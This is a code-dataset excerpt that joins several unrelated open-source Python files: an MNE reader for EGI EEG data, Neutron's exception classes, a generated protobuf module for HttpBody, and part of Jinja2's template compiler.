Names of channels or list of indices that should be designated
MISC channels. Default is None.
include : None | list
The event channels to be ignored when creating the synthetic
trigger. Defaults to None.
Note. Overrides `exclude` parameter.
exclude : None | list
The event channels to be ignored when creating the synthetic
trigger. Defaults to None. If None, channels that have at most
one event, as well as the ``sync`` and ``TREV`` channels, will
be ignored.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
raw : Instance of RawEGI
A Raw object containing EGI data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawEGI(input_fname, montage, eog, misc, include, exclude, verbose)
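# Hedged usage sketch (illustrative; 'sample.raw' is a placeholder path):
def _example_read_egi():
    raw = read_raw_egi('sample.raw')
    return raw, raw.event_id  # event codes mapped to the synthetic 'STI 014'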
class RawEGI(_BaseRaw):
"""Raw object from EGI simple binary file
"""
@verbose
def __init__(self, input_fname, montage=None, eog=None, misc=None,
include=None, exclude=None, verbose=None):
"""docstring for __init__"""
if eog is None:
eog = []
if misc is None:
misc = []
with open(input_fname, 'rb') as fid: # 'rb' important for py3k
logger.info('Reading EGI header from %s...' % input_fname)
egi_info = _read_header(fid)
logger.info(' Reading events ...')
_read_events(fid, egi_info) # update info + jump
logger.info(' Reading data ...')
# reads events as well
data = _read_data(fid, egi_info).astype(np.float64)
if egi_info['value_range'] != 0 and egi_info['bits'] != 0:
cal = egi_info['value_range'] / 2 ** egi_info['bits']
else:
cal = 1e-6
data[:egi_info['n_channels']] = data[:egi_info['n_channels']] * cal
logger.info(' Assembling measurement info ...')
if egi_info['n_events'] > 0:
event_codes = list(egi_info['event_codes'])
egi_events = data[-egi_info['n_events']:]
if include is None:
exclude_list = ['sync', 'TREV'] if exclude is None else exclude
exclude_inds = [i for i, k in enumerate(event_codes) if k in
exclude_list]
more_excludes = []
if exclude is None:
for ii, event in enumerate(egi_events):
if event.sum() <= 1 and event_codes[ii]:
more_excludes.append(ii)
if len(exclude_inds) + len(more_excludes) == len(event_codes):
warnings.warn('Did not find any event code with more '
'than one event.', RuntimeWarning)
else:
exclude_inds.extend(more_excludes)
exclude_inds.sort()
include_ = [i for i in np.arange(egi_info['n_events']) if
i not in exclude_inds]
include_names = [k for i, k in enumerate(event_codes)
if i in include_]
else:
include_ = [i for i, k in enumerate(event_codes)
if k in include]
include_names = include
for kk, v in [('include', include_names), ('exclude', exclude)]:
if isinstance(v, list):
for k in v:
if k not in event_codes:
raise ValueError('Could not find event named "%s"' % k)
elif v is not None:
raise ValueError('`%s` must be None or of type list' % kk)
event_ids = np.arange(len(include_)) + 1
try:
logger.info(' Synthesizing trigger channel "STI 014" ...')
logger.info(' Excluding events {%s} ...' %
", ".join([k for i, k in enumerate(event_codes)
if i not in include_]))
new_trigger = _combine_triggers(egi_events[include_],
remapping=event_ids)
data = np.concatenate([data, new_trigger])
except RuntimeError:
logger.info(' Found multiple events at the same time '
'sample. Could not create trigger channel.')
new_trigger = None
self.event_id = dict(zip([e for e in event_codes if e in
include_names], event_ids))
else:
# No events
self.event_id = None
new_trigger = None
info = _empty_info()
info['hpi_subsystem'] = None
info['events'], info['hpi_results'], info['hpi_meas'] = [], [], []
info['sfreq'] = float(egi_info['samp_rate'])
info['filename'] = input_fname
my_time = datetime.datetime(
egi_info['year'],
egi_info['month'],
egi_info['day'],
egi_info['hour'],
egi_info['minute'],
egi_info['second']
)
my_timestamp = time.mktime(my_time.timetuple())
info['meas_date'] = np.array([my_timestamp], dtype=np.float32)
info['projs'] = []
ch_names = ['EEG %03d' % (i + 1) for i in
range(egi_info['n_channels'])]
ch_names.extend(list(egi_info['event_codes']))
if new_trigger is not None:
ch_names.append('STI 014') # our new_trigger
info['nchan'] = nchan = len(data)
info['chs'] = []
info['ch_names'] = ch_names
info['bads'] = []
info['comps'] = []
info['custom_ref_applied'] = False
for ii, ch_name in enumerate(ch_names):
ch_info = {'cal': cal,
'logno': ii + 1,
'scanno': ii + 1,
'range': 1.0,
'unit_mul': 0,
'ch_name': ch_name,
'unit': FIFF.FIFF_UNIT_V,
'coord_frame': FIFF.FIFFV_COORD_HEAD,
'coil_type': FIFF.FIFFV_COIL_EEG,
'kind': FIFF.FIFFV_EEG_CH,
'eeg_loc': None,
'loc': np.array([0, 0, 0, 1] * 3, dtype='f4')}
if ch_name in eog or ii in eog or ii - nchan in eog:
ch_info['coil_type'] = FIFF.FIFFV_COIL_NONE
ch_info['kind'] = FIFF.FIFFV_EOG_CH
if ch_name in misc or ii in misc or ii - nchan in misc:
ch_info['coil_type'] = FIFF.FIFFV_COIL_NONE
ch_info['kind'] = FIFF.FIFFV_MISC_CH
if len(ch_name) == 4 or ch_name.startswith('STI'):
u = {'unit_mul': 0,
'cal': 1,
'coil_type': FIFF.FIFFV_COIL_NONE,
'unit': FIFF.FIFF_UNIT_NONE,
'kind': FIFF.FIFFV_STIM_CH}
ch_info.update(u)
info['chs'].append(ch_info)
_check_update_montage(info, montage)
orig_format = {'>f4': 'single', '>f8': 'double',
'>i2': 'int'}[egi_info['dtype']]
super(RawEGI, self).__init__(
info, data, filenames=[input_fname], orig_format=orig_format,
verbose=verbose)
logger.info(' Range : %d ... %d = %9.3f ... %9.3f secs'
% (self.first_samp, self.last_samp,
float(self.first_samp) / self.info['sfreq'],
float(self.last_samp) / self.info['sfreq']))
# use information from egi
logger.info('Ready.')
| bsd-3-clause |
asgard-lab/neutron | neutron/common/exceptions.py | 12 | 15936 | # Copyright 2011 VMware, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Neutron base exception handling.
"""
from oslo_utils import excutils
import six
class NeutronException(Exception):
"""Base Neutron Exception.
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
def __init__(self, **kwargs):
try:
super(NeutronException, self).__init__(self.message % kwargs)
self.msg = self.message % kwargs
except Exception:
with excutils.save_and_reraise_exception() as ctxt:
if not self.use_fatal_exceptions():
ctxt.reraise = False
# at least get the core message out if something happened
super(NeutronException, self).__init__(self.message)
if six.PY2:
def __unicode__(self):
return unicode(self.msg)
def __str__(self):
return self.msg
def use_fatal_exceptions(self):
return False
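# Hedged illustration (hypothetical subclass, not part of Neutron): the
# printf-style message contract described in the docstring above; keyword
# arguments passed to the constructor fill the %(...)s placeholders.
class _ExampleNotFound(NeutronException):
    message = _("Example %(example_id)s could not be found")
# _ExampleNotFound(example_id='42').msg == 'Example 42 could not be found'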
class BadRequest(NeutronException):
message = _('Bad %(resource)s request: %(msg)s')
class NotFound(NeutronException):
pass
class Conflict(NeutronException):
pass
class NotAuthorized(NeutronException):
message = _("Not authorized.")
class ServiceUnavailable(NeutronException):
message = _("The service is unavailable")
class NotSupported(NeutronException):
message = _('Not supported: %(msg)s')
class AdminRequired(NotAuthorized):
message = _("User does not have admin privileges: %(reason)s")
class ObjectNotFound(NotFound):
message = _("Object %(id)s not found.")
class NetworkNotFound(NotFound):
message = _("Network %(net_id)s could not be found")
class SubnetNotFound(NotFound):
message = _("Subnet %(subnet_id)s could not be found")
class SubnetPoolNotFound(NotFound):
message = _("Subnet pool %(subnetpool_id)s could not be found")
class PortNotFound(NotFound):
message = _("Port %(port_id)s could not be found")
class QosPolicyNotFound(NotFound):
message = _("QoS policy %(policy_id)s could not be found")
class QosRuleNotFound(NotFound):
message = _("QoS rule %(rule_id)s for policy %(policy_id)s "
"could not be found")
class PortNotFoundOnNetwork(NotFound):
message = _("Port %(port_id)s could not be found "
"on network %(net_id)s")
class PortQosBindingNotFound(NotFound):
message = _("QoS binding for port %(port_id)s and policy %(policy_id)s "
"could not be found")
class NetworkQosBindingNotFound(NotFound):
message = _("QoS binding for network %(net_id)s and policy %(policy_id)s "
"could not be found")
class PolicyFileNotFound(NotFound):
message = _("Policy configuration policy.json could not be found")
class PolicyInitError(NeutronException):
message = _("Failed to init policy %(policy)s because %(reason)s")
class PolicyCheckError(NeutronException):
message = _("Failed to check policy %(policy)s because %(reason)s")
class StateInvalid(BadRequest):
message = _("Unsupported port state: %(port_state)s")
class InUse(NeutronException):
message = _("The resource is inuse")
class QosPolicyInUse(InUse):
message = _("QoS Policy %(policy_id)s is used by "
"%(object_type)s %(object_id)s.")
class NetworkInUse(InUse):
message = _("Unable to complete operation on network %(net_id)s. "
"There are one or more ports still in use on the network.")
class SubnetInUse(InUse):
message = _("Unable to complete operation on subnet %(subnet_id)s. "
"%(reason)s")
def __init__(self, **kwargs):
if 'reason' not in kwargs:
kwargs['reason'] = _("One or more ports have an IP allocation "
"from this subnet.")
super(SubnetInUse, self).__init__(**kwargs)
class PortInUse(InUse):
message = _("Unable to complete operation on port %(port_id)s "
"for network %(net_id)s. Port already has an attached "
"device %(device_id)s.")
class ServicePortInUse(InUse):
message = _("Port %(port_id)s cannot be deleted directly via the "
"port API: %(reason)s")
class PortBound(InUse):
message = _("Unable to complete operation on port %(port_id)s, "
"port is already bound, port type: %(vif_type)s, "
"old_mac %(old_mac)s, new_mac %(new_mac)s")
class MacAddressInUse(InUse):
message = _("Unable to complete operation for network %(net_id)s. "
"The mac address %(mac)s is in use.")
class HostRoutesExhausted(BadRequest):
# NOTE(xchenum): probably make sense to use quota exceeded exception?
message = _("Unable to complete operation for %(subnet_id)s. "
"The number of host routes exceeds the limit %(quota)s.")
class DNSNameServersExhausted(BadRequest):
# NOTE(xchenum): probably make sense to use quota exceeded exception?
message = _("Unable to complete operation for %(subnet_id)s. "
"The number of DNS nameservers exceeds the limit %(quota)s.")
class InvalidIpForNetwork(BadRequest):
message = _("IP address %(ip_address)s is not a valid IP "
"for any of the subnets on the specified network.")
class InvalidIpForSubnet(BadRequest):
message = _("IP address %(ip_address)s is not a valid IP "
"for the specified subnet.")
class IpAddressInUse(InUse):
message = _("Unable to complete operation for network %(net_id)s. "
"The IP address %(ip_address)s is in use.")
class VlanIdInUse(InUse):
message = _("Unable to create the network. "
"The VLAN %(vlan_id)s on physical network "
"%(physical_network)s is in use.")
class FlatNetworkInUse(InUse):
message = _("Unable to create the flat network. "
"Physical network %(physical_network)s is in use.")
class TunnelIdInUse(InUse):
message = _("Unable to create the network. "
"The tunnel ID %(tunnel_id)s is in use.")
class TenantNetworksDisabled(ServiceUnavailable):
message = _("Tenant network creation is not enabled.")
class ResourceExhausted(ServiceUnavailable):
pass
class NoNetworkAvailable(ResourceExhausted):
message = _("Unable to create the network. "
"No tenant network is available for allocation.")
class NoNetworkFoundInMaximumAllowedAttempts(ServiceUnavailable):
message = _("Unable to create the network. "
"No available network found in maximum allowed attempts.")
class SubnetMismatchForPort(BadRequest):
message = _("Subnet on port %(port_id)s does not match "
"the requested subnet %(subnet_id)s")
class MalformedRequestBody(BadRequest):
message = _("Malformed request body: %(reason)s")
class Invalid(NeutronException):
def __init__(self, message=None):
self.message = message
super(Invalid, self).__init__()
class InvalidInput(BadRequest):
message = _("Invalid input for operation: %(error_message)s.")
class InvalidAllocationPool(BadRequest):
message = _("The allocation pool %(pool)s is not valid.")
class UnsupportedPortDeviceOwner(Conflict):
message = _("Operation %(op)s is not supported for device_owner "
"%(device_owner)s on port %(port_id)s.")
class OverlappingAllocationPools(Conflict):
message = _("Found overlapping allocation pools: "
"%(pool_1)s %(pool_2)s for subnet %(subnet_cidr)s.")
class OutOfBoundsAllocationPool(BadRequest):
message = _("The allocation pool %(pool)s spans "
"beyond the subnet cidr %(subnet_cidr)s.")
class MacAddressGenerationFailure(ServiceUnavailable):
message = _("Unable to generate unique mac on network %(net_id)s.")
class IpAddressGenerationFailure(Conflict):
message = _("No more IP addresses available on network %(net_id)s.")
class BridgeDoesNotExist(NeutronException):
message = _("Bridge %(bridge)s does not exist.")
class PreexistingDeviceFailure(NeutronException):
message = _("Creation failed. %(dev_name)s already exists.")
class QuotaResourceUnknown(NotFound):
message = _("Unknown quota resources %(unknown)s.")
class OverQuota(Conflict):
message = _("Quota exceeded for resources: %(overs)s")
class QuotaMissingTenant(BadRequest):
message = _("Tenant-id was missing from Quota request")
class InvalidQuotaValue(Conflict):
message = _("Change would make usage less than 0 for the following "
"resources: %(unders)s")
class InvalidSharedSetting(Conflict):
message = _("Unable to reconfigure sharing settings for network "
"%(network)s. Multiple tenants are using it")
class InvalidExtensionEnv(BadRequest):
message = _("Invalid extension environment: %(reason)s")
class ExtensionsNotFound(NotFound):
message = _("Extensions not found: %(extensions)s")
class InvalidContentType(NeutronException):
message = _("Invalid content type %(content_type)s")
class ExternalIpAddressExhausted(BadRequest):
message = _("Unable to find any IP address on external "
"network %(net_id)s.")
class TooManyExternalNetworks(NeutronException):
message = _("More than one external network exists")
class InvalidConfigurationOption(NeutronException):
message = _("An invalid value was provided for %(opt_name)s: "
"%(opt_value)s")
class GatewayConflictWithAllocationPools(InUse):
message = _("Gateway ip %(ip_address)s conflicts with "
"allocation pool %(pool)s")
class GatewayIpInUse(InUse):
message = _("Current gateway ip %(ip_address)s already in use "
"by port %(port_id)s. Unable to update.")
class NetworkVlanRangeError(NeutronException):
message = _("Invalid network VLAN range: '%(vlan_range)s' - '%(error)s'")
def __init__(self, **kwargs):
# Convert vlan_range tuple to 'start:end' format for display
if isinstance(kwargs['vlan_range'], tuple):
kwargs['vlan_range'] = "%d:%d" % kwargs['vlan_range']
super(NetworkVlanRangeError, self).__init__(**kwargs)
class PhysicalNetworkNameError(NeutronException):
message = _("Empty physical network name.")
class NetworkTunnelRangeError(NeutronException):
message = _("Invalid network Tunnel range: "
"'%(tunnel_range)s' - %(error)s")
def __init__(self, **kwargs):
# Convert tunnel_range tuple to 'start:end' format for display
if isinstance(kwargs['tunnel_range'], tuple):
kwargs['tunnel_range'] = "%d:%d" % kwargs['tunnel_range']
super(NetworkTunnelRangeError, self).__init__(**kwargs)
class NetworkVxlanPortRangeError(NeutronException):
message = _("Invalid network VXLAN port range: '%(vxlan_range)s'")
class VxlanNetworkUnsupported(NeutronException):
message = _("VXLAN Network unsupported.")
class DuplicatedExtension(NeutronException):
message = _("Found duplicate extension: %(alias)s")
class DeviceIDNotOwnedByTenant(Conflict):
message = _("The following device_id %(device_id)s is not owned by your "
"tenant or matches another tenants router.")
class InvalidCIDR(BadRequest):
message = _("Invalid CIDR %(input)s given as IP prefix")
class RouterNotCompatibleWithAgent(NeutronException):
message = _("Router '%(router_id)s' is not compatible with this agent")
class DvrHaRouterNotSupported(NeutronException):
message = _("Router '%(router_id)s' cannot be both DVR and HA")
class FailToDropPrivilegesExit(SystemExit):
"""Exit exception raised when a drop privileges action fails."""
code = 99
class FloatingIpSetupException(NeutronException):
def __init__(self, message=None):
self.message = message
super(FloatingIpSetupException, self).__init__()
class IpTablesApplyException(NeutronException):
def __init__(self, message=None):
self.message = message
super(IpTablesApplyException, self).__init__()
class NetworkIdOrRouterIdRequiredError(NeutronException):
message = _('network_id and router_id are None. One must be provided.')
class AbortSyncRouters(NeutronException):
message = _("Aborting periodic_sync_routers_task due to an error")
# Shared *aas exceptions, pending them being refactored out of Neutron
# proper.
class FirewallInternalDriverError(NeutronException):
"""Fwaas exception for all driver errors.
On any failure or exception in the driver, the driver should log it and
raise this exception to the agent.
"""
message = _("%(driver)s: Internal driver error.")
class MissingMinSubnetPoolPrefix(BadRequest):
message = _("Unspecified minimum subnet pool prefix")
class EmptySubnetPoolPrefixList(BadRequest):
message = _("Empty subnet pool prefix list")
class PrefixVersionMismatch(BadRequest):
message = _("Cannot mix IPv4 and IPv6 prefixes in a subnet pool")
class UnsupportedMinSubnetPoolPrefix(BadRequest):
message = _("Prefix '%(prefix)s' not supported in IPv%(version)s pool")
class IllegalSubnetPoolPrefixBounds(BadRequest):
message = _("Illegal prefix bounds: %(prefix_type)s=%(prefixlen)s, "
"%(base_prefix_type)s=%(base_prefixlen)s")
class IllegalSubnetPoolPrefixUpdate(BadRequest):
message = _("Illegal update to prefixes: %(msg)s")
class SubnetAllocationError(NeutronException):
message = _("Failed to allocate subnet: %(reason)s")
class AddressScopePrefixConflict(Conflict):
message = _("Failed to associate address scope: subnetpools "
"within an address scope must have unique prefixes")
class IllegalSubnetPoolAssociationToAddressScope(BadRequest):
message = _("Illegal subnetpool association: subnetpool %(subnetpool_id)s "
" cannot be associated with address scope"
" %(address_scope_id)s")
class IllegalSubnetPoolUpdate(BadRequest):
message = _("Illegal subnetpool update : %(reason)s")
class MinPrefixSubnetAllocationError(BadRequest):
message = _("Unable to allocate subnet with prefix length %(prefixlen)s, "
"minimum allowed prefix is %(min_prefixlen)s")
class MaxPrefixSubnetAllocationError(BadRequest):
message = _("Unable to allocate subnet with prefix length %(prefixlen)s, "
"maximum allowed prefix is %(max_prefixlen)s")
class SubnetPoolDeleteError(BadRequest):
message = _("Unable to delete subnet pool: %(reason)s")
class SubnetPoolQuotaExceeded(OverQuota):
message = _("Per-tenant subnet pool prefix quota exceeded")
class DeviceNotFoundError(NeutronException):
message = _("Device '%(device_name)s' does not exist")
class NetworkSubnetPoolAffinityError(BadRequest):
message = _("Subnets hosted on the same network must be allocated from "
"the same subnet pool")
class ObjectActionError(NeutronException):
message = _('Object action %(action)s failed because: %(reason)s')
class CTZoneExhaustedError(NeutronException):
message = _("IPtables conntrack zones exhausted, iptables rules cannot "
"be applied.")
| apache-2.0 |
axbaretto/beam | sdks/python/.tox/py27gcp/lib/python2.7/site-packages/google/api/httpbody_pb2.py | 17 | 2535 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/httpbody.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/api/httpbody.proto',
package='google.api',
syntax='proto3',
serialized_pb=_b('\n\x19google/api/httpbody.proto\x12\ngoogle.api\".\n\x08HttpBody\x12\x14\n\x0c\x63ontent_type\x18\x01 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\x0c\x42(\n\x0e\x63om.google.apiB\rHttpBodyProtoP\x01\xa2\x02\x04GAPIb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_HTTPBODY = _descriptor.Descriptor(
name='HttpBody',
full_name='google.api.HttpBody',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='content_type', full_name='google.api.HttpBody.content_type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='data', full_name='google.api.HttpBody.data', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=41,
serialized_end=87,
)
DESCRIPTOR.message_types_by_name['HttpBody'] = _HTTPBODY
HttpBody = _reflection.GeneratedProtocolMessageType('HttpBody', (_message.Message,), dict(
DESCRIPTOR = _HTTPBODY,
__module__ = 'google.api.httpbody_pb2'
# @@protoc_insertion_point(class_scope:google.api.HttpBody)
))
_sym_db.RegisterMessage(HttpBody)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\016com.google.apiB\rHttpBodyProtoP\001\242\002\004GAPI'))
# @@protoc_insertion_point(module_scope)
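# Illustrative usage sketch (an assumption, not part of the generated
# file): the registered class behaves like any protobuf message, e.g.
# body = HttpBody(content_type='application/json', data=_b('{}'))
# wire = body.SerializeToString()
# parsed = HttpBody.FromString(wire)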
| apache-2.0 |
illicitonion/givabit | lib/sdks/google_appengine_1.7.1/google_appengine/lib/jinja2/jinja2/compiler.py | 121 | 61899 | # -*- coding: utf-8 -*-
"""
jinja2.compiler
~~~~~~~~~~~~~~~
Compiles nodes into python code.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from cStringIO import StringIO
from itertools import chain
from copy import deepcopy
from jinja2 import nodes
from jinja2.nodes import EvalContext
from jinja2.visitor import NodeVisitor
from jinja2.exceptions import TemplateAssertionError
from jinja2.utils import Markup, concat, escape, is_python_keyword, next
operators = {
'eq': '==',
'ne': '!=',
'gt': '>',
'gteq': '>=',
'lt': '<',
'lteq': '<=',
'in': 'in',
'notin': 'not in'
}
try:
exec '(0 if 0 else 0)'
except SyntaxError:
have_condexpr = False
else:
have_condexpr = True
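# Illustrative note (assumption): on interpreters predating conditional
# expressions the exec above raises SyntaxError, and visit_CondExpr
# below falls back to the and/or-tuple trick, emitting roughly
# ((test) and (expr1,) or (expr2,))[0]
# instead of (expr1 if test else expr2).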
# what method to iterate over items do we want to use for dict iteration
# in generated code? on 2.x let's go with iteritems, on 3.x with items
if hasattr(dict, 'iteritems'):
dict_item_iter = 'iteritems'
else:
dict_item_iter = 'items'
# does if 0: dummy(x) get us x into the scope?
def unoptimize_before_dead_code():
x = 42
def f():
if 0: dummy(x)
return f
unoptimize_before_dead_code = bool(unoptimize_before_dead_code().func_closure)
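# Illustrative note: the probe above checks whether dead code such as
# `if 0: dummy(x)` still pulls `x` into f's closure. When it does
# (func_closure is non-empty), unoptimize_scope() below can guard its
# dummy() call with 'if 0: '; otherwise visit_Template emits a real
# `dummy = lambda *x: None` so the call is harmless at runtime.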
def generate(node, environment, name, filename, stream=None,
defer_init=False):
"""Generate the python source for a node tree."""
if not isinstance(node, nodes.Template):
raise TypeError('Can\'t compile non-template nodes')
generator = CodeGenerator(environment, name, filename, stream, defer_init)
generator.visit(node)
if stream is None:
return generator.stream.getvalue()
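# Minimal usage sketch (assumes a plain Environment named `env`; not in
# the original file):
# from jinja2 import Environment
# env = Environment()
# src = generate(env.parse('Hello {{ name }}!'), env,
# 'example', 'example.html')
# `src` now holds the Python module source that renders the template.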
def has_safe_repr(value):
"""Does the node have a safe representation?"""
if value is None or value is NotImplemented or value is Ellipsis:
return True
if isinstance(value, (bool, int, long, float, complex, basestring,
xrange, Markup)):
return True
if isinstance(value, (tuple, list, set, frozenset)):
for item in value:
if not has_safe_repr(item):
return False
return True
elif isinstance(value, dict):
for key, value in value.iteritems():
if not has_safe_repr(key):
return False
if not has_safe_repr(value):
return False
return True
return False
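# Illustrative examples (not in the original file):
# has_safe_repr(42) -> True (plain int)
# has_safe_repr({'a': [1, 2]}) -> True (safe container of safe items)
# has_safe_repr(object()) -> False (arbitrary objects fall through)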
def find_undeclared(nodes, names):
"""Check if the names passed are accessed undeclared. The return value
is a set of all the undeclared names from the sequence of names found.
"""
visitor = UndeclaredNameVisitor(names)
try:
for node in nodes:
visitor.visit(node)
except VisitorExit:
pass
return visitor.undeclared
class Identifiers(object):
"""Tracks the status of identifiers in frames."""
def __init__(self):
# variables that are known to be declared (probably from outer
# frames or because they are special for the frame)
self.declared = set()
# undeclared variables from outer scopes
self.outer_undeclared = set()
# names that are accessed without being explicitly declared by
# this one or any of the outer scopes. Names can appear both in
# declared and undeclared.
self.undeclared = set()
# names that are declared locally
self.declared_locally = set()
# names that are declared by parameters
self.declared_parameter = set()
def add_special(self, name):
"""Register a special name like `loop`."""
self.undeclared.discard(name)
self.declared.add(name)
def is_declared(self, name):
"""Check if a name is declared in this or an outer scope."""
if name in self.declared_locally or name in self.declared_parameter:
return True
return name in self.declared
def copy(self):
return deepcopy(self)
class Frame(object):
"""Holds compile time information for us."""
def __init__(self, eval_ctx, parent=None):
self.eval_ctx = eval_ctx
self.identifiers = Identifiers()
# a toplevel frame is the root + soft frames such as if conditions.
self.toplevel = False
# the root frame is basically just the outermost frame, so no if
# conditions. This information is used to optimize inheritance
# situations.
self.rootlevel = False
# in some dynamic inheritance situations the compiler needs to add
# write tests around output statements.
self.require_output_check = parent and parent.require_output_check
# inside some tags we are using a buffer rather than yield statements.
# this for example affects {% filter %} or {% macro %}. If a frame
# is buffered this variable points to the name of the list used as
# buffer.
self.buffer = None
# the name of the block we're in, otherwise None.
self.block = parent and parent.block or None
# a set of actually assigned names
self.assigned_names = set()
# the parent of this frame
self.parent = parent
if parent is not None:
self.identifiers.declared.update(
parent.identifiers.declared |
parent.identifiers.declared_parameter |
parent.assigned_names
)
self.identifiers.outer_undeclared.update(
parent.identifiers.undeclared -
self.identifiers.declared
)
self.buffer = parent.buffer
def copy(self):
"""Create a copy of the current one."""
rv = object.__new__(self.__class__)
rv.__dict__.update(self.__dict__)
rv.identifiers = object.__new__(self.identifiers.__class__)
rv.identifiers.__dict__.update(self.identifiers.__dict__)
return rv
def inspect(self, nodes):
"""Walk the node and check for identifiers. If the scope is hard (eg:
enforce on a python level) overrides from outer scopes are tracked
differently.
"""
visitor = FrameIdentifierVisitor(self.identifiers)
for node in nodes:
visitor.visit(node)
def find_shadowed(self, extra=()):
"""Find all the shadowed names. extra is an iterable of variables
that may be defined with `add_special` which may occur scoped.
"""
i = self.identifiers
return (i.declared | i.outer_undeclared) & \
(i.declared_locally | i.declared_parameter) | \
set(x for x in extra if i.is_declared(x))
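# Illustrative example: if `item` is already declared in an outer scope
# and a nested block declares `item` locally as well (say a for-loop
# target), find_shadowed() reports it so push_scope() can stash the old
# value in a temporary alias before the inner assignment clobbers it.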
def inner(self):
"""Return an inner frame."""
return Frame(self.eval_ctx, self)
def soft(self):
"""Return a soft frame. A soft frame may not be modified as
standalone thing as it shares the resources with the frame it
was created from, but it's not a rootlevel frame any longer.
"""
rv = self.copy()
rv.rootlevel = False
return rv
__copy__ = copy
class VisitorExit(RuntimeError):
"""Exception used by the `UndeclaredNameVisitor` to signal a stop."""
class DependencyFinderVisitor(NodeVisitor):
"""A visitor that collects filter and test calls."""
def __init__(self):
self.filters = set()
self.tests = set()
def visit_Filter(self, node):
self.generic_visit(node)
self.filters.add(node.name)
def visit_Test(self, node):
self.generic_visit(node)
self.tests.add(node.name)
def visit_Block(self, node):
"""Stop visiting at blocks."""
class UndeclaredNameVisitor(NodeVisitor):
"""A visitor that checks if a name is accessed without being
declared. This is different from the frame visitor as it will
not stop at closure frames.
"""
def __init__(self, names):
self.names = set(names)
self.undeclared = set()
def visit_Name(self, node):
if node.ctx == 'load' and node.name in self.names:
self.undeclared.add(node.name)
if self.undeclared == self.names:
raise VisitorExit()
else:
self.names.discard(node.name)
def visit_Block(self, node):
"""Stop visiting a blocks."""
class FrameIdentifierVisitor(NodeVisitor):
"""A visitor for `Frame.inspect`."""
def __init__(self, identifiers):
self.identifiers = identifiers
def visit_Name(self, node):
"""All assignments to names go through this function."""
if node.ctx == 'store':
self.identifiers.declared_locally.add(node.name)
elif node.ctx == 'param':
self.identifiers.declared_parameter.add(node.name)
elif node.ctx == 'load' and not \
self.identifiers.is_declared(node.name):
self.identifiers.undeclared.add(node.name)
def visit_If(self, node):
self.visit(node.test)
real_identifiers = self.identifiers
old_names = real_identifiers.declared_locally | \
real_identifiers.declared_parameter
def inner_visit(nodes):
if not nodes:
return set()
self.identifiers = real_identifiers.copy()
for subnode in nodes:
self.visit(subnode)
rv = self.identifiers.declared_locally - old_names
# we have to remember the undeclared variables of this branch
# because we will have to pull them.
real_identifiers.undeclared.update(self.identifiers.undeclared)
self.identifiers = real_identifiers
return rv
body = inner_visit(node.body)
else_ = inner_visit(node.else_ or ())
# the differences between the two branches are also pulled as
# undeclared variables
real_identifiers.undeclared.update(body.symmetric_difference(else_) -
real_identifiers.declared)
# remember those that are declared.
real_identifiers.declared_locally.update(body | else_)
def visit_Macro(self, node):
self.identifiers.declared_locally.add(node.name)
def visit_Import(self, node):
self.generic_visit(node)
self.identifiers.declared_locally.add(node.target)
def visit_FromImport(self, node):
self.generic_visit(node)
for name in node.names:
if isinstance(name, tuple):
self.identifiers.declared_locally.add(name[1])
else:
self.identifiers.declared_locally.add(name)
def visit_Assign(self, node):
"""Visit assignments in the correct order."""
self.visit(node.node)
self.visit(node.target)
def visit_For(self, node):
"""Visiting stops at for blocks. However the block sequence
is visited as part of the outer scope.
"""
self.visit(node.iter)
def visit_CallBlock(self, node):
self.visit(node.call)
def visit_FilterBlock(self, node):
self.visit(node.filter)
def visit_Scope(self, node):
"""Stop visiting at scopes."""
def visit_Block(self, node):
"""Stop visiting at blocks."""
class CompilerExit(Exception):
"""Raised if the compiler encountered a situation where it just
doesn't make sense to further process the code. Any block that
raises such an exception is not further processed.
"""
class CodeGenerator(NodeVisitor):
def __init__(self, environment, name, filename, stream=None,
defer_init=False):
if stream is None:
stream = StringIO()
self.environment = environment
self.name = name
self.filename = filename
self.stream = stream
self.created_block_context = False
self.defer_init = defer_init
# aliases for imports
self.import_aliases = {}
# a registry for all blocks. Because blocks are moved out
# into the global python scope they are registered here
self.blocks = {}
# the number of extends statements so far
self.extends_so_far = 0
# some templates have a rootlevel extends. In this case we
# can safely assume that we're a child template and do some
# more optimizations.
self.has_known_extends = False
# the current line number
self.code_lineno = 1
# registry of all filters and tests (global, not block local)
self.tests = {}
self.filters = {}
# the debug information
self.debug_info = []
self._write_debug_info = None
# the number of new lines before the next write()
self._new_lines = 0
# the line number of the last written statement
self._last_line = 0
# true if nothing was written so far.
self._first_write = True
# used by the `temporary_identifier` method to get new
# unique, temporary identifier
